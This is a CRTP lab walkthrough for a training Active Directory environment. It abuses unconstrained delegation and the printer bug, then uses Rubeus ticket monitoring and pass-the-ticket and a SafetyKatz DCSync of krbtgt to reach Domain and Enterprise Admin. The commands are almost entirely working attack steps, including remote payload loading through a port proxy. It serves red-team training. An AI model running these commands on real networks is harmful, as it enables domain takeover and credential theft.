CRTP Lab 15

Task 1

Find a server in the dcorp domain where Unconstrained Delegation is enabled.

Run InviShell and use PowerView to find machines with unconstrained delegation.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name
DCORP-DC
DCORP-APPSRV

Task 2

Compromise the server and escalate to Domain Admin privileges.

To escalate to DA privileges via unconstrained delegation, we need to compromise a user that has local admin access on APPSRV.

Since we extracted secrets of appadmin, srvadmin, and websvc from dcrop-adminsrv, let's check if anyone of them has local admin privileges on dcorp-appsrv using Find-PSRemotingLocalAdminAccess.

Let's check fo appadmin.

# ArgSplit "asktgt"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# From the new process, we try to find if the appadmin user has admin access on dcorp-appsrv

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local

dcorp-adminsrv
dcorp-appsrv

Turns out appadmin has local admin privs on appsrv.

To trick a high priv user (appadmin) to connect to a machine (dcorp-appsrv) with Unconstrained Delegation, we use Printer Bug.

Exit from the Invishell as appadmin and copy Loader to dcorp-appsrv and enabled port forwarding to run Rubeus on listener mode from attacker machine.

exit
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorpappsrv\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-appsrv cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72


# ArgSplit "monitor"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap

To force authentication from dcorp-dc to dcorp-appsrv, we can use "MS-RPRN.exe" from student machine.

C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

With Rubeus monitoring the authentication, we get the captured TGT in base64. We can use it to Pass The Ticket with Rubeus on student VM, and then use SafetyKatz for DCSync.

From an elevated shell:

# ArgSplit "lsadump::dcsync"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:doIGRTCCBkGgAwIBBaEDAgEWooIFGjCCBRZhggUSMIIFDqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBLYwggSyoAMCARKhAwIBAqKCBKQEggSgIj7StdN


# Use SafetyKatz to run DCSync
C:\AD\Tools>Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Task 3

Escalate to Enterprise Admins privileges by abusing Printer Bug!

To escalate to Enterprise Admin, we need to force authentication from mcorp-dc.

From dcorp-appsrv, run Rubeus in monitor mode.

winrs -r:dcorp-appsrv cmd

# To trigger authentication from mcorp-dc to dcorp-appsrv, use MS-RPRN on student VM.
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorpappsrv.dollarcorp.moneycorp.local

Copy the base64 encoded ticket and use it to Pass The Ticket with Rubeus on student VM.

# ArgSplit "ptt"
C:\Windows\system32>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:doIF1jCCBdKgAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIkMCKgAwIBAqEbMBk

We can now use DCSync from this process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
PreviousUnconstrained DelegationNextConstrained Delegation

Last updated